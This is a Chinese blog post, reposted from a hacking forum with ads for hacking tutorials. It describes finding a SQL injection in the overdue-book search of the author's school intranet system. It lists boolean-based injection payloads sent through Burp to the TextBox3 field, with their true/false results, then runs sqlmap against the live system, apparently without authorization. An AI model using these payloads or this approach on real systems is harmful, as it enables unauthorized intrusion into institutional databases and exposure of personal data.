
扫码领资料
获黑客教程
免费&进群


前言: 按理来说首先肯定是信息收集啥的,不过这个系统是我们学校内网系统, 所以只是测试了功能点,话不多说,直接开冲借书超期查询出存在sql注入漏洞 首先看看页面 可以看到,有一个搜索框,输个1测试下 再加个单引号测试一下,初步判断有无注入 好家伙,等了半分钟都没变化,我还以为你没传完数据呢 话不多说,直接burp重放测试 看到为POST提交,TextBox3参数为我们搜索框输入的内容,且输入1时会有以下响应 可惜的是,我发现输入1'也会是这个响应 经过很长时间的测试以及构造payload,我发现了奇点 我换了一种思路,假设输入1和1'返回200是数据库正确处理数据,那也就是说,输入1'不弹窗只是单纯的不弹窗,和报错没关系 然后我经过了一段时间的探索,发现用or可以成功让他真正意义的报错 如图: 看一下浏览器,显示的是这样 构造的payload如下 -1' or 3+318-318-1=0+0+0+1 --+ -->false -1' or 3*2<(0+5+318-318) --+ -->false -1' or 3*2>(0+5+318-318) --+ -->false -1' or 2+1-1-1=1 and 000318=000318 --+ -->ture -1' or 000318=000318 and 3+1-1-1=1 --+ -->false -1' or 3*2=5 and 000318=000318 --+ -->false -1' or 3*2=6 and 000318=000318 --+ -->ture -1' or 3*2*0=6 and 000318=000318 --+ -->false -1' or 3*2*1=6 and 000318=000318 --+ -->ture 于是乎,成功判断该处有sql注入漏洞 把burp的POST数据包复制粘贴到1.txt,直接上sqlmap跑 因为是自己学校的网站,而且sqlmap跑的速度太慢(光跑数据库就跑了半个小时), 所以就不继续深挖了 |
作者:夜猫灰禾
来源: https://bbs.ichunqiu.com/thread-59266-1-1.html
学习更多黑客技能!体验靶场实战练习
(黑客视频资料及工具)

往期内容回顾

本文分享自微信公众号 - 暗网黑客(HackRead)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。